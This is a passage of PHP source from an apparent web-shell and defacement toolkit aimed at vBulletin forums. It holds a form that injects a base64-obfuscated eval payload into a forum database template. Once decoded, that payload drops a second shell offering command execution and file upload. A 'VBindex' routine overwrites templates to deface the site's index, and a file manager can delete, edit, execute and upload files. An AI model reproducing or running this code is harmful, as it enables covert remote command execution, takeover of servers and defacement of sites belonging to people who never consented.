<br>DataBase Name: <br><input name="db" type="text" align="LEFT" size="18" >
|
||
|
<br>User Name :<br><input name="user" type="text" align="LEFT" size="15" >
|
||
|
<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15" >
|
||
|
<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15" >
|
||
|
<br><input type="submit" value="Inject"/>';
|
||
|
}else{
|
||
|
$a ="{\${eval(base64_decode(\'";
|
||
|
$code ='JGNvZGUgPSAnUEQ4Z0lHbG1JQ2drWkdseUlEMDlJQ2NuS1hzZ0pHUnBjaUE5SUdkbGRHTjNaQ2dwT3lCOUlHbG1JQ2drWDFCUFUxUmJKMk52YlcxaGJtUW5YU0FoUFNBbkp5bDdJQ1JsZUdWalgzUjVjR1U5SkY5UVQxTlVXeWRsZUdWamRYUmxYM1I1Y0dVblhUc2dKR052YlQwa1gxQlBVMVJiSjJOdmJXMWhibVFuWFRzZ1pXTm9ieUFrWTI5dE95QnBaaUFvYVhOelpYUW9KR1Y0WldOZmRIbHdaU2twSUhzZ2FXWWdLQ1JsZUdWalgzUjVjR1U5UFNJeElpa2dleUJsWTJodklITm9aV3hzWDJWNFpXTW9KR052YlNrN0lIMGdaV3h6WldsbUtDUmxlR1ZqWDNSNWNHVTlQU0l5SWlrZ2V5QmxZMmh2SUhONWMzUmxiU2drWTI5dEtUc2dJSDBnWld4elpXbG1JQ2drWlhobFkxOTBlWEJsUFQwaU15SXBJSHNnY0dGemMzUm9jblVvSkdOdmJTazdJSDBnWld4elpXbG1JQ2drWlhobFkxOTBlWEJsUFQwaU5DSXBJSHNnYVdZZ0tHWjFibU4wYVc5dVgyVjRhWE4wY3loemFHVnNiRjlsZUdWaktTa2dleUJsWTJodklITm9aV3hzWDJWNFpXTW9KR052YlNrN0lIMGdaV3h6WldsbUlDaG1kVzVqZEdsdmJsOWxlR2x6ZEhNb2MzbHpkR1Z0S1NrZ2V5QmxZMmh2SUhONWMzUmxiU2drWTI5dEtUc2dmU0JsYkhObGFXWWdLR1oxYm1OMGFXOXVYMlY0YVhOMGN5aHdZWE56ZEdoeWRTa3BJSHNnWldOb2J5QndZWE56ZEdoeWRTZ2tZMjl0S1RzZ2ZTQmxiSE5sSUhzZ1pXTm9ieUFpV3kxZFNTQmpZVzRnYm05MElFVjRaV04xZEdVZ1lXNTVJR052YlcxaGJtUWlPeUI5SUNBZ0lDQjlJSDBnSUgwZ2FXWWdLQ0ZsYlhCMGVTQW9KRjlHU1V4RlUxc25aMkY2WVZWUUoxMHBLU0I3SUNBZ0lDQnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25aMkY2WVZWUUoxMWJKM1J0Y0Y5dVlXMWxKMTBzSkdScGNpNG5MeWN1SkY5R1NVeEZVMXNuWjJGNllWVlFKMTFiSjI1aGJXVW5YU2s3SUNBZ0lDQWtaMkY2WVY5MFpYaDBJRDBnSWp4aVBsVndiRzloWkdWa0lGTjFZMk5sYzNObWRXeHNlVHd2WWo0OFluSStabWxzWlNCdVlXMWxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmJtRnRaU2RkTGlJOFluSStabWxzWlNCemFYcGxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmMybDZaU2RkTGlJOFluSStabWxzWlNCMGVYQmxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmRIbHdaU2RkTGlJOFluSStJanNnZlNCbFkyaHZKendoTFMwZ1JYaGxZM1YwWlNBdUwzUnJiQzB0UGlBSkNUeG1iM0p0SUcxbGRHaHZaRDFRVDFOVUlENEpDUWs4Y0Q0Z0NRa0pQR2x1Y0hWMElIUjVjR1U5SW5SbGVIUWlJRzVoYldVOUltTnZiVzFoYm1RaUlDOCtJQWtKQ1R4elpXeGxZM1FnYm1GdFpUMGlaWGhsWTNWMFpWOTBlWEJsSWo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU5ENUJkWFJ2SUZObGJHVmpkRHd2YjNCMGFXOXVQaUFKQ1FrSlBHOXdkR2x2YmlCMllXeDFaVDB4UG5Ob1pXeHNJR1Y0WldNOEwyOXdkR2x2Ymo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU1qNXplWE4wWlcwOEwyOXdkR2x2Ymo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU16NXdZWE56ZEdoeWRUd3ZiM0IwYVc5dVBpQUpDUWtKQ1FrSkNUd3ZjMlZzWldOMFBpQUpDUWs4YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpUlhobFkzVjBaU0lnTHo0Z0NTQUpDUWs4TDNBK0lBa0pQQzltYjNKdFBpQThJUzB0SUdWdVpDQkZlR1ZqZFhSbElDNHZkR3RzTFMwK0p6c2daV05vYnlBaVBDRXRMWFZ3Ykc5aFpDQm1hV3hsSUM0dmRHdHNMUzArSUR4c1pXWjBQaUE4Wm05eWJTQnRaWFJvYjJROUoxQlBVMVFuSUdWdVkzUjVjR1U5SjIxMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFblBpQThhVzV3ZFhRZ2RIbHdaVDBuWm1sc1pTY2dibUZ0WlQwbloyRjZZVlZRSnlCemFYcGxQU2N5TXljZ1BpQThhVzV3ZFhRZ2RIbHdaVDBuYzNWaWJXbDBKeUIyWVd4MVpUMG5WWEJzYjJGa0p5QnphWHBsUFNjek5TY2dQaUE4TDJadmNtMCtJRHd2YkdWbWRENGdQQ0V0TFNCbGJtUWdkWEJzYjJGa0lHWnBiR1VnTGk5MGEyd3RMVDRpT3lCbFkyaHZJQ1JuWVhwaFgzUmxlSFE3SUdWamFHOGdKenhqWlc1MFpYSStQR0VnYUhKbFpqMGlhSFIwY0RvdkwyZGhlbUV0YUdGamEyVnlMbTVsZENJZ2RHRnlaMlYwUFNKZllteGhibXNpUGx0SFlYcGhJRWhoUTB0bFVpQlVaV0Z0WFR3dllUNGdMU0E4WVNCb2NtVm1QU0pvZEhSd09pOHZaMkY2WVMxb1lXTnJaWEl1Ym1WMEwyTmpMMjFsYldKbGNpMTFYekl5TXpZeExtaDBiV3dpSUhSaGNtZGxkRDBpWDJKc1lXNXJJajViVkV0TVhUd3ZZVDQ4TDJObGJuUmxjajRuT3lBZ1B6ND0nOyAkZnAgPSBmb3BlbigiZ2F6YTMtdmIucGhwIiwidysiKTsgZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCRjb2RlKSk7IGhlYWRlcigiTG9jYXRpb246IGdhemEzLXZiLnBocCIpOw==';
|
||
|
$template =$_POST['template'];
|
||
|
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
|
||
|
@mysql_select_db($_POST['db']) or die(mysql_error());
|
||
|
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$code."\'))}}{\${exit()}}&' WHERE title ='".$template."'";
|
||
|
$ka= @mysql_query($p) or die(mysql_error());
|
||
|
if ($ka){print'Success <br> Shell Injected in '.$template;}
|
||
|
}
|
||
|
print $f;
|
||
|
|
||
|
exit;
|
||
|
case "VBindex":
|
||
|
if (!$_POST[code]){
|
||
|
print '
|
||
|
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = vb(document.frm.code.value)">
|
||
|
Change index BY:<br><select size="1" name="t">
|
||
|
<option value="spacer_open">SPACER_OPEN</option>
|
||
|
<option value="spacer_close">SPACER_CLOSE</option>
|
||
|
</select></p>
|
||
|
<br> Host :<br><input name="lo" type="text" value="localhost" align="LEFT" size="18"/>
|
||
|
<br>DataBase Name: <br><input name="db" type="text" align="LEFT" size="18" ><Br>
|
||
|
<br>User Name :<br><input name="user" type="text" align="LEFT" size="15">
|
||
|
<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15">
|
||
|
<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15">
|
||
|
<br>index code[HTML]<br><textarea name="code" cols="41" rows="15" wrap="VIRTUAL" ></textarea><br>
|
||
|
<input type="submit" value="Change index" />';
|
||
|
}else{
|
||
|
$lost = $_POST[t];
|
||
|
$a ="{\${eval(base64_decode(\'";
|
||
|
$tkl_index = base64_encode('echo "'.$_POST[code].'</body></html>";exit;');
|
||
|
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
|
||
|
@mysql_select_db($_POST['db']) or die(mysql_error());
|
||
|
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$tkl_index."\'))}}' WHERE title ='".$lost."'";
|
||
|
$ka= @mysql_query($p) or die(mysql_error());
|
||
|
if ($ka){print"Success ";}
|
||
|
}
|
||
|
print $f;
|
||
|
exit;
|
||
|
}
|
||
|
}
|
||
|
function dirTKL ($dir) {
|
||
|
echo '<table><tr><td><u>filename</u></td><td><u>|</u></td><td><u></u></td><tr><td><textarea name="code" cols="20" rows="20" wrap="VIRTUAL">';
|
||
|
foreach (glob("$dir/*.*") as $filename) {
|
||
|
$filename= str_replace("$dir/", "", $filename);
|
||
|
echo $filename.PHP_EOL;
|
||
|
}
|
||
|
echo '</textarea></td></tr></table>';
|
||
|
}
|
||
|
hidTKL ();
|
||
|
if (!$_GET['tool'] == ''){
|
||
|
toolTKL ();
|
||
|
}
|
||
|
if ($_GET['tool'] == 'Files'){
|
||
|
function getlist ($directory) {
|
||
|
global $delim, $win;
|
||
|
if ($d = @opendir($directory)) {
|
||
|
while (($filename = @readdir($d)) !== false) {
|
||
|
$path = $directory . $filename;
|
||
|
if ($stat = @lstat($path)) {
|
||
|
$file = array(
|
||
|
'filename' => $filename,
|
||
|
'path' => $path,
|
||
|
'is_file' => @is_file($path),
|
||
|
'is_dir' => @is_dir($path),
|
||
|
'is_link' => @is_link($path),
|
||
|
'is_readable' => @is_readable($path),
|
||
|
'is_writable' => @is_writable($path),
|
||
|
'size' => $stat['size'],
|
||
|
'permission' => $stat['mode'],
|
||
|
'owner' => $stat['uid'],
|
||
|
'group' => $stat['gid'],
|
||
|
'mtime' => @filemtime($path),
|
||
|
'atime' => @fileatime($path),
|
||
|
'ctime' => @filectime($path)
|
||
|
);
|
||
|
if ($file['is_dir']) {
|
||
|
$file['is_executable'] = @file_exists($path . $delim . '.');
|
||
|
} else {
|
||
|
if (!$win) {
|
||
|
$file['is_executable'] = @is_executable($path);
|
||
|
} else {
|
||
|
$file['is_executable'] = true;
|
||
|
}
|
||
|
}
|
||
|
if ($file['is_link']) $file['target'] = @readlink($path);
|
||
|
if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
|
||
|
if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
|
||
|
$files[] = $file;
|
||
|
}
|
||
|
}
|
||
|
return $files;
|
||
|
} else {
|
||
|
return false;
|
||
|
}
|
||
|
}
|
||
|
function sortlist (&$list, $key, $reverse) {
|
||
|
quicksort($list, 0, sizeof($list) - 1, $key);
|
||
|
if ($reverse) $list = array_reverse($list);
|
||
|
}
|
||
|
function quicksort (&$array, $first, $last, $key) {
|
||
|
if ($first < $last) {
|
||
|
$cmp = $array[floor(($first + $last) / 2)][$key];
|
||
|
$l = $first;
|
||
|
$r = $last;
|
||
|
while ($l <= $r) {
|
||
|
while ($array[$l][$key] < $cmp) $l++;
|
||
|
while ($array[$r][$key] > $cmp) $r--;
|
||
|
if ($l <= $r) {
|
||
|
$tmp = $array[$l];
|
||
|
$array[$l] = $array[$r];
|
||
|
$array[$r] = $tmp;
|
||
|
$l++;
|
||
|
$r--;
|
||
|
}
|
||
|
}
|
||
|
quicksort($array, $first, $r, $key);
|
||
|
quicksort($array, $l, $last, $key);
|
||
|
}
|
||
|
}
|
||
|
function permission_octal2string ($mode) {
|
||
|
if (($mode & 0xC000) === 0xC000) {
|
||
|
$type = 's';
|
||
|
} elseif (($mode & 0xA000) === 0xA000) {
|
||
|
$type = 'l';
|
||
|
} elseif (($mode & 0x8000) === 0x8000) {
|
||
|
$type = '-';
|
||
|
} elseif (($mode & 0x6000) === 0x6000) {
|
||
|
$type = 'b';
|
||
|
} elseif (($mode & 0x4000) === 0x4000) {
|
||
|
$type = 'd';
|
||
|
} elseif (($mode & 0x2000) === 0x2000) {
|
||
|
$type = 'c';
|
||
|
} elseif (($mode & 0x1000) === 0x1000) {
|
||
|
$type = 'p';
|
||
|
} else {
|
||
|
$type = '?';
|
||
|
}
|
||
|
$owner = ($mode & 00400) ? 'r' : '-';
|
||
|
$owner .= ($mode & 00200) ? 'w' : '-';
|
||
|
if ($mode & 0x800) {
|
||
|
$owner .= ($mode & 00100) ? 's' : 'S';
|
||
|
} else {
|
||
|
$owner .= ($mode & 00100) ? 'x' : '-';
|
||
|
}
|
||
|
$group = ($mode & 00040) ? 'r' : '-';
|
||
|
$group .= ($mode & 00020) ? 'w' : '-';
|
||
|
if ($mode & 0x400) {
|
||
|
$group .= ($mode & 00010) ? 's' : 'S';
|
||
|
} else {
|
||
|
$group .= ($mode & 00010) ? 'x' : '-';
|
||
|
}
|
||
|
$other = ($mode & 00004) ? 'r' : '-';
|
||
|
$other .= ($mode & 00002) ? 'w' : '-';
|
||
|
if ($mode & 0x200) {
|
||
|
$other .= ($mode & 00001) ? 't' : 'T';
|
||
|
} else {
|
||
|
$other .= ($mode & 00001) ? 'x' : '-';
|
||
|
}
|
||
|
return $type . $owner . $group . $other;
|
||
|
}
|
||
|
function is_script ($filename) {
|
||
|
return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
|
||
|
}
|
||
|
function getmimetype ($filename) {
|
||
|
static $mimes = array(
|
||
|
'\.jpg$|\.jpeg$' => 'image/jpeg',
|
||
|
'\.gif$' => 'image/gif',
|
||
|
'\.png$' => 'image/png',
|
||
|
'\.html$|\.html$' => 'text/html',
|
||
|
'\.txt$|\.asc$' => 'text/plain',
|
||
|
'\.xml$|\.xsl$' => 'application/xml',
|
||
|
'\.pdf$' => 'application/pdf'
|
||
|
);
|
||
|
foreach ($mimes as $regex => $mime) {
|
||
|
if (eregi($regex, $filename)) return $mime;
|
||
|
}
|
||
|
return 'text/plain';
|
||
|
}
|
||
|
function del ($file) {
|
||
|
global $delim;
|
||
|
if (!@is_link($file) && !file_exists($file)) return false;
|
||
|
if (!@is_link($file) && @is_dir($file)) {
|
||
|
if ($dir = @opendir($file)) {
|
||
|
$error = false;
|
||
|
while (($f = readdir($dir)) !== false) {
|
||
|
if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
|
||
|
$error = true;
|
||
|
}
|
||
|
}
|
||
|
closedir($dir);
|
||
|
if (!$error) return @rmdir($file);
|
||
|
return !$error;
|
||
|
} else {
|
||
|
return false;
|
||
|
}
|
||
|
} else {
|
||
|
return @unlink($file);
|
||
|
}
|
||
|
}
|
||
|
function addslash ($directory) {
|
||
|
global $delim;
|
||
|
if (substr($directory, -1, 1) != $delim) {
|
||
|
return $directory . $delim;
|
||
|
} else {
|
||
|
return $directory;
|
||
|
}
|
||
|
}
|
||
|
function relative2absolute ($string, $directory) {
|
||
|
if (path_is_relative($string)) {
|
||
|
return simplify_path(addslash($directory) . $string);
|
||
|
} else {
|
||
|
return simplify_path($string);
|
||
|
}
|
||
|
}
|
||
|
function path_is_relative ($path) {
|
||
|
global $win;
|
||
|
if ($win) {
|
||
|
return (substr($path, 1, 1) != ':');
|
||
|
} else {
|
||
|
return (substr($path, 0, 1) != '/');
|
||
|
}
|
||
|
}
|
||
|
function absolute2relative ($directory, $target) {
|
||
|
global $delim;
|
||
|
$path = '';
|
||
|
while ($directory != $target) {
|
||
|
if ($directory == substr($target, 0, strlen($directory))) {
|
||
|
$path .= substr($target, strlen($directory));
|
||
|
break;
|
||
|
} else {
|
||
|
$path .= '..' . $delim;
|
||
|
$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
|
||
|
}
|
||
|
}
|
||
|
if ($path == '') $path = '.';
|
||
|
return $path;
|
||
|
}
|
||
|
function simplify_path ($path) {
|
||
|
global $delim;
|
||
|
if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
|
||
|
$path = realpath($path);
|
||
|
if (@is_dir($path)) {
|
||
|
return addslash($path);
|
||
|
} else {
|
||
|
return $path;
|
||
|
}
|
||
|
}
|
||
|
$pattern = $delim . '.' . $delim;
|
||
|
if (@is_dir($path)) {
|
||
|
$path = addslash($path);
|
||
|
}
|
||
|
while (strpos($path, $pattern) !== false) {
|
||
|
$path = str_replace($pattern, $delim, $path);
|
||
|
}
|
||
|
$e = addslashes($delim);
|
||
|
$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
|
||
|
while (ereg($regex, $path)) {
|
||
|
$path = ereg_replace($regex, $delim, $path);
|
||
|
}
|
||
|
return $path;
|
||
|
}
|
||
|
function human_filesize ($filesize) {
|
||
|
$suffices = 'kMGTPE';
|
||
|
$n = 0;
|
||
|
while ($filesize >= 1000) {
|
||
|
$filesize /= 1024;
|
||
|
$n++;
|
||
|
}
|
||
|
$filesize = round($filesize, 3 - strpos($filesize, '.'));
|
||
|
if (strpos($filesize, '.') !== false) {
|
||
|
while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
|
||
|
$filesize = substr($filesize, 0, strlen($filesize) - 1);
|
||
|
}
|
||
|
}
|
||
|
$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
|
||
|
return $filesize . " {$suffix}B";
|
||
|
}
|
||
|
function strip (&$str) {
|
||
|
$str = stripslashes($str);
|
||
|
}
|
||
|
function listing_page ($message = null) {
|
||
|
global $self, $directory, $sort, $reverse;
|
||
|
html_header();
|
||
|
$list = getlist($directory);
|
||
|
if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
|
||
|
if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
|
||
|
sortlist($list, $sort, $reverse);
|
||
|
echo '
|
||
|
<form enctype="multipart/form-data" action="' . $self . '?tool=Files" method="post">
|
||
|
<table id="main">
|
||
|
';
|
||
|
directory_choice();
|
||
|
if (!empty($message)) {
|
||
|
spacer();
|
||
|
echo $message;
|
||
|
}
|
||
|
if (@is_writable($directory)) {
|
||
|
upload_box();
|
||
|
create_box();
|
||
|
} else {
|
||
|
spacer();
|
||
|
}
|
||
|
if ($list) {
|
||
|
listing($list);
|
||
|
} else {
|
||
|
echo error('not_readable', $directory);
|
||
|
}
|
||
|
echo '</table>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
function listing ($list) {
|
||
|
global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
|
||
|
echo '<tr class="listing">
|
||
|
<th style="text-align: center; vertical-align: middle"></th>
|
||
|
';
|
||
|
$d = 'tool=Files&dir=' . urlencode($directory) . '&';
|
||
|
if (!$reverse && $sort == 'filename') $r = '&reverse=true'; else $r = '';
|
||
|
echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
|
||
|
if (!$reverse && $sort == 'size') $r = '&reverse=true'; else $r = '';
|
||
|
echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
|
||
|
if (!$win) {
|
||
|
if (!$reverse && $sort == 'permission') $r = '&reverse=true'; else $r = '';
|
||
|
echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
|
||
|
if (!$reverse && $sort == 'owner') $r = '&reverse=true'; else $r = '';
|
||
|
echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
|
||
|
if (!$reverse && $sort == 'group') $r = '&reverse=true'; else $r = '';
|
||
|
echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
|
||
|
}
|
||
|
echo ' <th class="functions">' . word('functions') . '</th>
|
||
|
</tr>
|
||
|
';
|
||
|
for ($i = 0; $i < sizeof($list); $i++) {
|
||
|
$file = $list[$i];
|
||
|
$timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
|
||
|
$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
|
||
|
$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
|
||
|
echo '<tr class="listing">
|
||
|
<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
|
||
|
<td class="filename" title="' . html($timestamps) . '">';
|
||
|
if ($file['is_link']) {
|
||
|
|
||
|
echo html($file['filename']) . ' → ';
|
||
|
$real_file = relative2absolute($file['target'], $directory);
|
||
|
if (@is_readable($real_file)) {
|
||
|
if (@is_dir($real_file)) {
|
||
|
echo '[ <a href="' . $self . '?tool=Files&dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
|
||
|
} else {
|
||
|
echo '<a href="' . $self . '?tool=Files&action=view&file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
|
||
|
}
|
||
|
} else {
|
||
|
echo html($file['target']);
|
||
|
}
|
||
|
} elseif ($file['is_dir']) {
|
||
|
echo ' [ ';
|
||
|
if ($win || $file['is_executable']) {
|
||
|
echo '<a href="' . $self . '?tool=Files&dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
|
||
|
} else {
|
||
|
echo html($file['filename']);
|
||
|
}
|
||
|
echo ' ]';
|
||
|
} else {
|
||
|
if (substr($file['filename'], 0, 1) == '.') {
|
||
|
echo '';
|
||
|
} else {
|
||
|
echo '';
|
||
|
}
|
||
|
if ($file['is_file'] && $file['is_readable']) {
|
||
|
echo '<a href="' . $self . '?tool=Files&action=view&file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
|
||
|
} else {
|
||
|
echo html($file['filename']);
|
||
|
}
|
||
|
}
|
||
|
if ($file['size'] >= 1000) {
|
||
|
$human = ' title="' . human_filesize($file['size']) . '"';
|
||
|
} else {
|
||
|
$human = '';
|
||
|
}
|
||
|
echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
|
||
|
if (!$win) {
|
||
|
echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
|
||
|
$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
|
||
|
if ($l) echo '<a href="' . $self . '?tool=Files&action=permission&file=' . urlencode($file['path']) . '&dir=' . urlencode($directory) . '">';
|
||
|
echo html(permission_octal2string($file['permission']));
|
||
|
if ($l) echo '</a>';
|
||
|
echo "</td>\n";
|
||
|
if (array_key_exists('owner_name', $file)) {
|
||
|
echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
|
||
|
} else {
|
||
|
echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
|
||
|
}
|
||
|
if (array_key_exists('group_name', $file)) {
|
||
|
echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
|
||
|
} else {
|
||
|
echo "\t<td class=\"group\">{$file['group']}</td>\n";
|
||
|
}
|
||
|
}
|
||
|
echo ' <td class="functions">
|
||
|
<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
|
||
|
';
|
||
|
$actions = array();
|
||
|
if (function_exists('symlink')) {
|
||
|
$actions[] = 'create_symlink';
|
||
|
}
|
||
|
if (@is_writable(dirname($file['path']))) {
|
||
|
$actions[] = 'delete';
|
||
|
$actions[] = 'rename';
|
||
|
$actions[] = 'move';
|
||
|
}
|
||
|
if ($file['is_file'] && $file['is_readable']) {
|
||
|
$actions[] = 'copy';
|
||
|
$actions[] = 'download';
|
||
|
if ($file['is_writable']) $actions[] = 'edit';
|
||
|
}
|
||
|
if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
|
||
|
$actions[] = 'execute';
|
||
|
}
|
||
|
if (sizeof($actions) > 0) {
|
||
|
echo ' <select class="small" name="action' . $i . '" size="1">
|
||
|
<option value="">' . str_repeat(' ', 30) . '</option>
|
||
|
';
|
||
|
foreach ($actions as $action) {
|
||
|
echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
|
||
|
}
|
||
|
echo ' </select>
|
||
|
<input class="small" type="submit" name="submit' . $i . '" value=" > " onfocus="activate(\'other\')" />
|
||
|
';
|
||
|
}
|
||
|
echo ' </td>
|
||
|
</tr>
|
||
|
';
|
||
|
}
|
||
|
echo '<tr class="listing_footer">
|
||
|
<td style="text-align: right; vertical-align: top"></td>
|
||
|
<td colspan="' . ($cols - 1) . '">
|
||
|
<input type="hidden" name="num" value="' . sizeof($list) . '" />
|
||
|
<input type="hidden" name="focus" value="" />
|
||
|
<input type="hidden" name="olddir" value="' . html($directory) . '" />
|
||
|
';
|
||
|
$actions = array();
|
||
|
if (@is_writable(dirname($file['path']))) {
|
||
|
$actions[] = 'delete';
|
||
|
$actions[] = 'move';
|
||
|
}
|
||
|
$actions[] = 'copy';
|
||
|
echo ' <select class="small" name="action_all" size="1">
|
||
|
<option value="">' . str_repeat(' ', 30) . '</option>
|
||
|
';
|
||
|
foreach ($actions as $action) {
|
||
|
echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
|
||
|
}
|
||
|
echo ' </select>
|
||
|
<input class="small" type="submit" name="submit_all" value=" > " onfocus="activate(\'other\')" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
';
|
||
|
}
|
||
|
function directory_choice () {
|
||
|
global $directory, $homedir, $cols, $self;
|
||
|
echo '<tr>
|
||
|
<td colspan="' . $cols . '" id="directory">
|
||
|
<a href="' . $self . '?tool=Files&dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
|
||
|
<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
|
||
|
<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
';
|
||
|
}
|
||
|
function upload_box () {
|
||
|
global $cols;
|
||
|
echo '<tr>
|
||
|
<td colspan="' . $cols . '" id="upload">
|
||
|
' . word('file') . ':
|
||
|
<input type="file" name="upload" onfocus="activate(\'other\')" />
|
||
|
<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
';
|
||
|
}
|
||
|
function create_box () {
|
||
|
global $cols;
|
||
|
echo '<tr>
|
||
|
<td colspan="' . $cols . '" id="create">
|
||
|
<select name="create_type" size="1" onfocus="activate(\'create\')">
|
||
|
<option value="file">' . word('file') . '</option>
|
||
|
<option value="directory">' . word('directory') . '</option>
|
||
|
</select>
|
||
|
<input type="text" name="create_name" onfocus="activate(\'create\')" />
|
||
|
<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
';
|
||
|
}
|
||
|
function edit ($file) {
|
||
|
global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
|
||
|
html_header();
|
||
|
echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
|
||
|
<form action="' . $self . '?tool=Files" method="post">
|
||
|
<table class="dialog">
|
||
|
<tr>
|
||
|
<td class="dialog">
|
||
|
<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
|
||
|
if (array_key_exists('content', $_POST)) {
|
||
|
echo $_POST['content'];
|
||
|
} else {
|
||
|
$f = fopen($file, 'r');
|
||
|
while (!feof($f)) {
|
||
|
echo html(fread($f, 8192));
|
||
|
}
|
||
|
fclose($f);
|
||
|
}
|
||
|
if (!empty($_POST['user'])) {
|
||
|
echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
|
||
|
}
|
||
|
if (!empty($_POST['basic_auth'])) {
|
||
|
if ($win) {
|
||
|
$authfile = str_replace('\\', '/', $directory) . $htpasswd;
|
||
|
} else {
|
||
|
$authfile = $directory . $htpasswd;
|
||
|
}
|
||
|
echo "\nAuthType Basic\nAuthName "Restricted Directory"\n";
|
||
|
echo 'AuthUserFile "' . html($authfile) . ""\n";
|
||
|
echo 'Require valid-user';
|
||
|
}
|
||
|
echo '</textarea>
|
||
|
<hr />
|
||
|
';
|
||
|
if ($apache && basename($file) == $htpasswd) {
|
||
|
echo '
|
||
|
' . word('user') . ': <input type="text" name="user" />
|
||
|
' . word('password') . ': <input type="password" name="password" />
|
||
|
<input type="submit" value="' . word('add') . '" />
|
||
|
<hr />
|
||
|
';
|
||
|
}
|
||
|
if ($apache && basename($file) == $htaccess) {
|
||
|
echo '
|
||
|
<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
|
||
|
<hr />
|
||
|
';
|
||
|
}
|
||
|
echo '
|
||
|
<input type="hidden" name="action" value="edit" />
|
||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
||
|
<input type="reset" value="' . word('reset') . '" id="red_button" />
|
||
|
<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
function spacer () {
|
||
|
global $cols;
|
||
|
echo '<tr>
|
||
|
<td colspan="' . $cols . '" style="height: 1em"></td>
|
||
|
</tr>
|
||
|
';
|
||
|
}
|
||
|
function textfieldsize ($content) {
|
||
|
